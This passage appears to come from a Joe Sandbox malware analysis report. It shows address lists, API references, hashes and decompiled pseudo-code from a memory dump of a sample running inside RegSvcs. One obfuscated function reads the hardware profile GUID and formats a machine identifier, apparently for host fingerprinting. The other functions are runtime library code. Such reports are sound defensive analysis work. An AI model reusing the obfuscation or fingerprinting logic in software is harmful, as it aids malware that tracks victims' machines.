0x0044bc67
0x0044bc82
0x0044bc87
0x0044bc8d
0x0044bc8f
0x0044bc9a
0x0044bc9a
0x00000000
0x0044bc8f
0x0044bbe8
0x0044bbef
0x0044bbf1
0x0044bc28
0x0044bc28
0x0044bc32
0x0044bc35
0x0044bc3c
0x0044bc3c
0x0044bc3c
0x0044bc48
0x00000000
0x0044bc48
0x0044bbf3
0x0044bbf7
0x00000000
0x00000000
0x0044bbf9
0x0044bc08
0x0044bc0d
0x0044bc10
0x0044bc11
0x0044bc14
0x0044bc14
0x0044bc1b
0x0044bc1d
0x0044bc20
0x0044bc23
0x0044bc26
0x00000000
0x00000000
0x00000000
0x0044bb86
0x0044bb8b
0x0044bb8e
0x0044bb95
0x00000000
0x0044bb95
0x0044bb5f
0x0044bb64
0x0044bb6a
0x0044bb6c
0x00000000
0x0044bb71

APIs

Part of subcall function 0044BFD9: CreateFileW.KERNEL32(00000000,00000000,?,0044BBD6,?,?,00000000,?,0044BBD6,00000000,0000000C), ref: 0044BFF6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044BC41
__dosmaperr.LIBCMT ref: 0044BC48
GetFileType.KERNEL32(00000000), ref: 0044BC54
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044BC5E
__dosmaperr.LIBCMT ref: 0044BC67
CloseHandle.KERNEL32(00000000), ref: 0044BC87
CloseHandle.KERNEL32(00000000), ref: 0044BDD4
GetLastError.KERNEL32 ref: 0044BE06
__dosmaperr.LIBCMT ref: 0044BE0D

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: f9a6deb8c12d7d2bd7c167e56a7e706bb5487f0581defd45b6318899e4eee9a8
Instruction ID: 2d5e2d02e819e852b25f63aed3f081833fbf072b202b6f04c0840d6da1b3b90d
Opcode Fuzzy Hash: f9a6deb8c12d7d2bd7c167e56a7e706bb5487f0581defd45b6318899e4eee9a8
Instruction Fuzzy Hash: ECA139319141549FEF199F68DC91BAE7BA0EF46314F18015EF802DB3A1DB39D802CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0BB Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 436
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041F0BB(void* __edx) {
				void* _v16;
				intOrPtr _v20;
				signed short _v22;
				signed int _v24;
				signed int _v28;
				signed char _v29;
				struct tagHW_PROFILE_INFOW* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;
				signed int _t129;
				signed int _t149;
				signed int _t161;
				signed int _t173;
				intOrPtr _t183;
				signed int _t189;
				intOrPtr _t198;
				signed int _t213;
				signed int _t216;
				signed int _t220;
				signed int _t222;
				signed int _t227;
				unsigned int _t230;
				signed int _t235;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr _t248;
				intOrPtr _t249;
				struct tagHW_PROFILE_INFOW* _t250;
				intOrPtr _t251;

				_t243 = __edx;
				_v20 = 0xa278f3a9;
				_t248 = _v60;
				_t246 = _v64;
				while(1) {
					_t124 = _v20;
					if(_t124 <= 0xebea008) {
					}
					L2:
					if(_t124 > 0xc9b0b0da) {
						if(_t124 <= 0xe5de47a8) {
							if(_t124 > 0xcca7c3c9) {
								if(_t124 == 0xcca7c3ca) {
									_v29 =  *((intOrPtr*)(_v44 + _v56));
									_v20 = 0x3e71f9d2;
								} else {
									if(_t124 == 0xe1ac2d29) {
										_v20 = 0xcca7c3ca;
									}
								}
							} else {
								if(_t124 == 0xc9b0b0db) {
									_v20 = 0xf92e82de;
								} else {
									if(_t124 == 0xc9dd24ae) {
										_t173 = (_v24 + (_v24 + _t169 * 4) * 4 + 0xffffff89 >> 1) + 0x4c;
										_v24 = _t173;
										_push(_t173);
										_push(0x410b);
										_push(0x3d76);
										E0041E67B(_t173);
										_t249 = _t249 + 0xc;
										_v20 = 0xbd7c45c1;
									}
								}
							}
							while(1) {
								_t124 = _v20;
								if(_t124 <= 0xebea008) {
								}
								goto L2;
							}
						}
						if(_t124 <= 0xf92e82dd) {
							if(_t124 == 0xe5de47a9) {
								_v92 = _v56 + _v56 + _v52;
								_v20 = 0xebea009;
								while(1) {
									_t124 = _v20;
									if(_t124 <= 0xebea008) {
									}
									goto L10;
								}
								goto L2;
							}
							if(_t124 != 0xf17d0de4) {
								continue;
							}
							_t213 = 0x68c4 + _v24 * 0xb4;
							_v24 = _t213;
							E0041F094(_t124);
							_t125 = 0x3e544020;
							if(_t213 < 0xea) {
								_t125 = 0xfe9e6b54;
							}
							L101:
							_v20 = _t125;
							continue;
						}
						if(_t124 == 0xf92e82de) {
							E004338A0(_v40, L"%s_%s_%s_%08X_%s", 0x22);
							_push( &(_v36->szHwProfileGuid));
							_push(_v80);
							_push(_v76);
							_push(_v72);
							E0041E67B( &(_v36->szHwProfileGuid), _v48, 0x1000, _v40, _v68);
							_t183 = E00443644(_v48, 0x1000);
							_t249 = _t249 + 0x34;
							_v84 = _t183;
							_v20 = 0x6310c7aa;
							continue;
						}
						if(_t124 == 0xfe9e6b54) {
							_v24 = _v22 & 0xfff0;
							E0041DAD0();
							E0041F0BB(_t243);
							_v20 = 0x6310c7aa;
							continue;
						}
						if(_t124 == 0xd4731c8) {
							_t189 = _v24 + 0xffffff1e;
							_v24 = _t189;
							_push(_t189);
							_push(0x542e);
							_push(0x5fb);
							E0041F840(_t189);
							_t249 = _t249 + 0xc;
							L37:
							E00405CD8();
							_v20 = 0xbd7c45c1;
						}
						continue;
					}
					if(_t124 > 0xa50e5435) {
						if(_t124 <= 0xb24e6ef5) {
							if(_t124 == 0xa50e5436) {
								_v28 = 0x1a45 + _v28 * 0xba;
								_v20 = 0xe5de47a9;
							} else {
								if(_t124 == 0xa9c50648) {
									_v76 = E0041E6DB();
									_v80 = E0041E6BA(_t193);
									E004343A0(_t246, _v36, 0, 0xf4);
									GetCurrentHwProfileW(_v36);
									_push(0x2000);
									_push(1);
									_t198 = E0043EBC9();
									_t249 = _t249 + 0x14;
									_v48 = _t198;
									_v20 = 0x7ad6c1a2;
								}
							}
							continue;
						}
						if(_t124 == 0xbd00218a) {
							_v20 = 0x9c31a222;
							_t246 = 0;
							continue;
						}
						if(_t124 != 0xbd7c45c1) {
							if(_t124 != 0xb24e6ef6) {
								continue;
							}
							_v60 = _t248;
							_v64 = _t246;
							return _t248;
						} else {
							_v68 = E0041F094(_t124);
							_v72 = E0041DAD0();
							_v20 = 0x374609b9;
							continue;
						}
					}
					if(_t124 <= 0x8fec2d07) {
						if(_t124 == 0x81c33858) {
							_t230 = _v24 >> 0x13;
							_v24 = _t230;
							_t125 = 0x6dcd08ed;
							if(_t230 != 0xa5) {
								_t125 = 0x323dd097;
							}
							goto L101;
						} else {
							if(_t124 == 0x8ba133cb) {
								_v24 = _v24 << 0x00000008 | 0x00000075;
								E0041E6BA(_v24 << 0x00000008 | 0x00000075);
								_v20 = 0xbd7c45c1;
							}
							continue;
						}
					}
					if(_t124 == 0x8fec2d08) {
						_v28 = 0xfffffe7a + _v28 * 0xda >> 1;
						_v20 = 0xbd00218a;
						continue;
					}
					if(_t124 == 0x9c31a222) {
						_v56 = _t246;
						_v20 = 0xe1ac2d29;
						continue;
					}
					if(_t124 != 0xa278f3a9) {
						continue;
					} else {
						_push(_t124);
						_t250 = _t249 - 0xf0;
						_v36 = _t250;
						_t251 = _t250 - 0x24;
						_v40 = _t251;
						_t249 = _t251 - 0x14;
						_v44 = _t249;
						_t248 =  *0x460be8; // 0x0
						_t125 = 0xbd7c45c1;
						if(_t248 != 0) {
							_t125 = 0xb24e6ef6;
						}
						goto L101;
					}
					L10:
					if(_t124 > 0x3e54401f) {
						if(_t124 <= 0x6310c7a9) {
							if(_t124 > 0x3fbd82f8) {
								if(_t124 == 0x3fbd82f9) {
									_t227 = ((_v24 << 0xf) + 0xff710000 >> 9) + 0xffffff5f;
									_v24 = _t227;
									_t125 = 0xbd7c45c1;
									if(_t227 >= 0x47) {
										_t125 = 0xeccad34;
									}
									goto L101;
								}
								if(_t124 != 0x4b1c6c50) {
									continue;
								}
								_t235 = (_v24 << 0xb) + 0xfff93800;
								_v24 = _t235;
								_t125 = 0x3fbd82f9;
								if(_t235 < 0xee) {
									_t125 = 0x3e544020;
								}
								goto L101;
							}
							if(_t124 == 0x3e544020) {
								_push(0x29);
								_push(1);
								_t126 = E0043EBC9();
								_t249 = _t249 + 8;
								_v52 = _t126;
								_v20 = 0x8fec2d08;
								continue;
							}
							if(_t124 != 0x3e71f9d2) {
								continue;
							} else {
								_t129 = _v28 + 0xffffffc6 >> 7;
								_t237 = _t129 * _t129;
								_t243 = _t237 * 0xff9 - 1;
								_v28 = _t129 + 0xffffffbc;
								_t125 = 0x2e3fa76a;
								if(_t237 != _t237 * 0xff9 - 1) {
									_t125 = 0x75badd0d;
								}
								goto L101;
							}
						}
						if(_t124 <= 0x6dcd08ec) {
							if(_t124 == 0x6310c7aa) {
								E004089B0(_v48, _v84 + _v84, _v44);
								_t249 = _t249 + 0xc;
								_v20 = 0x2a071572;
								continue;
							}
							if(_t124 != 0x637a2d94) {
								continue;
							}
							_t216 = 0xffffb758 + _v24 * 0x4b00;
							_v24 = _t216;
							E0041F094(_t124);
							_t125 = 0x75badd0d;
							if(_t216 >= 0x14) {
								_t125 = 0xf17d0de4;
							}
							goto L101;
						}
						if(_t124 == 0x6dcd08ed) {
							_t220 = (_v24 + 0xc8 >> 0xc) + 0xffffff21;
							_v24 = _t220;
							E0041DAD0();
							E0041DAD0();
							_t125 = 0xbd7c45c1;
							if(_t220 >= 0x24) {
								_t125 = 0xd4731c8;
							}
							goto L101;
						} else {
							if(_t124 == 0x75badd0d) {
								_v88 = _v29 & 0x000000ff;
								_v20 = 0xa50e5436;
							} else {
								if(_t124 == 0x7ad6c1a2) {
									_v28 = 0x0003a000 + _v28 * 0x00038800 & 0xffffe000;
									_v20 = 0xc9b0b0db;
								}
							}
							continue;
						}
					}
					if(_t124 <= 0x2a071571) {
						if(_t124 > 0x15e709b7) {
							if(_t124 == 0x15e709b8) {
								 *0x460be8 = _v52;
								_v20 = 0x3da30a9b;
								continue;
							}
							if(_t124 != 0x28a42e16) {
								continue;
							}
							_t149 = (_v24 >> 0x00000009 & 0x007ff800) + 0x3efbd;
							L67:
							_v24 = _t149;
							_v20 = 0xf92e82de;
							continue;
						}
						if(_t124 == 0xebea009) {
							E0041F840(_t124, _v92, 3, "%02X", _v88);
							_t249 = _t249 + 0x10;
							_t246 = _v56 + 1;
							_t125 = 0x15e709b8;
							if(_t246 != 0x14) {
								_t125 = 0x9c31a222;
							}
							goto L101;
						}
						if(_t124 != 0xeccad34) {
							continue;
						} else {
							_v24 = _v24 + 0xfffffeec;
							goto L37;
						}
					}
					if(_t124 <= 0x323dd096) {
						if(_t124 == 0x2a071572) {
							_v28 = 0xfffffe94 + _v28 * 0x1a800000;
							_v20 = 0x3e544020;
							continue;
						}
						if(_t124 != 0x2e3fa76a) {
							continue;
						}
						_t149 = _v24 * 0x0260c800 | 0x00000027;
						goto L67;
					}
					if(_t124 == 0x323dd097) {
						_t222 = 0xdb + ((_v24 << 7) + _v24 * 2 + 0xffffda6c >> 4) * 0x7594;
						_v24 = _t222;
						E0041E6DB();
						E0041F0BB(_t243);
						_t125 = 0x8ba133cb;
						if(_t222 >= 0xbe) {
							_t125 = 0xbd7c45c1;
						}
						goto L101;
					}
					if(_t124 == 0x374609b9) {
						_t161 = _v28;
						_t242 = _t161 * 0xf5 * _t161 * 0xf5;
						_t243 = _t242 * 0x229d - 1;
						_v28 = _t161 * 0x0001ea00 | 0x0000005f;
						_t125 = 0x81c33858;
						if(_t242 * 0x229d - 1 != _t242) {
							_t125 = 0xa9c50648;
						}
						goto L101;
					} else {
						if(_t124 == 0x3da30a9b) {
							_v28 = 0xffef0700 + _v28 * 0x370000;
							_v20 = 0xb24e6ef6;
							_t248 = _v52;
						}
						continue;
					}
				}
			}

0x0041f0bb
0x0041f0c4
0x0041f0cb
0x0041f0ce
0x0041f0d1
0x0041f0d1
0x0041f0d9
0x0041f0d9
0x0041f0db
0x0041f0e0
0x0041f1b7
0x0041f2e0
0x0041f4ff
0x0041f7e7
0x0041f7ea
0x0041f505
0x0041f50a
0x0041f510
0x0041f510
0x0041f50a
0x0041f2e6
0x0041f2eb
0x0041f706
0x0041f2f1
0x0041f2f6
0x0041f30a
0x0041f30d
0x0041f310
0x0041f311
0x0041f316
0x0041f31b
0x0041f320
0x0041f323
0x0041f323
0x0041f2f6
0x0041f2eb
0x0041f0d1
0x0041f0d1
0x0041f0d9
0x0041f0d9
0x00000000
0x0041f0d9
0x0041f0d1
0x0041f1c2
0x0041f3df
0x0041f774
0x0041f777
0x0041f0d1
0x0041f0d1
0x0041f0d9
0x0041f0d9
0x00000000
0x0041f0d9
0x00000000
0x0041f0d1
0x0041f3ea
0x00000000
0x00000000
0x0041f3f7
0x0041f3fd
0x0041f400
0x0041f405
0x0041f410
0x0041f416
0x0041f416
0x0041f81d
0x0041f81d
0x00000000
0x0041f81d
0x0041f1cd
0x0041f60f
0x0041f61d
0x0041f61e
0x0041f621
0x0041f624
0x0041f636
0x0041f642
0x0041f647
0x0041f64a
0x0041f64d
0x00000000
0x0041f64d
0x0041f1d8
0x0041f660
0x0041f663
0x0041f668
0x0041f66d
0x00000000
0x0041f66d
0x0041f1e3
0x0041f1f1
0x0041f1f3
0x0041f1f6
0x0041f1f7
0x0041f1fc
0x0041f201
0x0041f206
0x0041f2ca
0x0041f2ca
0x0041f2cf
0x0041f2cf
0x00000000
0x0041f1e3
0x0041f0eb
0x0041f26a
0x0041f468
0x0041f7b2
0x0041f7b5
0x0041f46e
0x0041f473
0x0041f47e
0x0041f486
0x0041f496
0x0041f4a1
0x0041f4a7
0x0041f4ac
0x0041f4ae
0x0041f4b3
0x0041f4b6
0x0041f4b9
0x0041f4b9
0x0041f473
0x00000000
0x0041f468
0x0041f275
0x0041f6c4
0x0041f6cb
0x00000000
0x0041f6cb
0x0041f280
0x0041f82a
0x00000000
0x00000000
0x0041f830
0x0041f833
0x0041f83f
0x0041f286
0x0041f28b
0x0041f293
0x0041f296
0x00000000
0x0041f296
0x0041f280
0x0041f0f6
0x0041f387
0x0041f730
0x0041f733
0x0041f736
0x0041f741
0x0041f747
0x0041f747
0x00000000
0x0041f38d
0x0041f392
0x0041f3a1
0x0041f3a4
0x0041f3a9
0x0041f3a9
0x00000000
0x0041f392
0x0041f387
0x0041f101
0x0041f56a
0x0041f56d
0x00000000
0x0041f56d
0x0041f10c
0x0041f579
0x0041f57c
0x00000000
0x0041f57c
0x0041f117
0x00000000
0x0041f119
0x0041f119
0x0041f11a
0x0041f122
0x0041f125
0x0041f12a
0x0041f12d
0x0041f132
0x0041f135
0x0041f13b
0x0041f142
0x0041f148
0x0041f148
0x00000000
0x0041f142
0x0041f152
0x0041f157
0x0041f213
0x0041f334
0x0041f521
0x0041f805
0x0041f80b
0x0041f80e
0x0041f816
0x0041f818
0x0041f818
0x00000000
0x0041f816
0x0041f52c
0x00000000
0x00000000
0x0041f538
0x0041f53e
0x0041f541
0x0041f54c
0x0041f552
0x0041f552
0x00000000
0x0041f54c
0x0041f33f
0x0041f712
0x0041f714
0x0041f716
0x0041f71b
0x0041f71e
0x0041f721
0x00000000
0x0041f721
0x0041f34a
0x00000000
0x0041f350
0x0041f356
0x0041f35b
0x0041f364
0x0041f368
0x0041f36b
0x0041f372
0x0041f378
0x0041f378
0x00000000
0x0041f372
0x0041f34a
0x0041f21e
0x0041f425
0x0041f792
0x0041f797
0x0041f79a
0x00000000
0x0041f79a
0x0041f430
0x00000000
0x00000000
0x0041f43d
0x0041f443
0x0041f446
0x0041f44b
0x0041f453
0x0041f459
0x0041f459
0x00000000
0x0041f453
0x0041f229
0x0041f686
0x0041f68c
0x0041f68f
0x0041f694
0x0041f699
0x0041f6a1
0x0041f6a7
0x0041f6a7
0x00000000
0x0041f22f
0x0041f234
0x0041f6b5
0x0041f6b8
0x0041f23a
0x0041f23f
0x0041f256
0x0041f259
0x0041f259
0x0041f23f
0x00000000
0x0041f234
0x0041f229
0x0041f162
0x0041f2a7
0x0041f4ca
0x0041f7c4
0x0041f7d2
0x00000000
0x0041f7d2
0x0041f4d5
0x00000000
0x00000000
0x0041f4e6
0x0041f4eb
0x0041f4eb
0x0041f4ee
0x00000000
0x0041f4ee
0x0041f2b2
0x0041f6df
0x0041f6e4
0x0041f6ea
0x0041f6eb
0x0041f6f3
0x0041f6f9
0x0041f6f9
0x00000000
0x0041f6f3
0x0041f2bd
0x00000000
0x0041f2c3
0x0041f2c3
0x00000000
0x0041f2c3
0x0041f2bd
0x0041f16d
0x0041f3ba
0x0041f75d
0x0041f760
0x00000000
0x0041f760
0x0041f3c5
0x00000000
0x00000000
0x0041f3d2
0x00000000
0x0041f3d2
0x0041f178
0x0041f5a1
0x0041f5a7
0x0041f5aa
0x0041f5af
0x0041f5b4
0x0041f5bf
0x0041f5c5
0x0041f5c5
0x00000000
0x0041f5bf
0x0041f183
0x0041f5cf
0x0041f5d8
0x0041f5e7
0x0041f5eb
0x0041f5ee
0x0041f5f5
0x0041f5fb
0x0041f5fb
0x00000000
0x0041f189
0x0041f18e
0x0041f1a0
0x0041f1a3
0x0041f1aa
0x0041f1aa
0x00000000
0x0041f18e
0x0041f183

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 0041F4A1

Strings

@T>, xrefs: 0041F552
%s_%s_%s_%08X_%s, xrefs: 0041F607
@T>, xrefs: 0041F760
%02X, xrefs: 0041F6D5
@T>, xrefs: 0041F405
@T>, xrefs: 0041F33A

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: CurrentProfile
String ID: @T>$ @T>$ @T>$ @T>$%02X$%s_%s_%s_%08X_%s
API String ID: 2104809126-1835858479
Opcode ID: aa11881477f97ec58ffb764d4bbc85f72f26f362b72e9c7cb71dcc1d17b97799
Instruction ID: 638095906ccebd9ef32896772ac881d23a301dbd738089d9e7b6211c03cda71f
Opcode Fuzzy Hash: aa11881477f97ec58ffb764d4bbc85f72f26f362b72e9c7cb71dcc1d17b97799
Instruction Fuzzy Hash: 5FF1E9B1D042098FDF14DF98D9816FEBAB0AB18314F24053BE511E6392D77989CA8B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00450E2F Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00450E2F(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E00453060(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E00443BF4(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E00450C94(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E004470A6(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					L004505A9(_t203, _t204, _t216, _t219, _a28, __eflags);
					E0045307D(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E004507CD(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E00447076(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E00443C86(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E00443C86(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E00443C86(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00443C86(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E00451254(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E00447006(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E00450AC8( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00431D88(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E00443C86(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E004509E6();
																_t204 = _t202;
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E00443C86(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E00443C86(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00443C86(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E00443C86(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E004509E6();
										_t206 = _t202;
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E004433CA(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E004507AE( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0x460b70) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E00431D88(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E0045073D( &_v64);
											E0045310D( &_v64, 0x45f04c);
											L64:
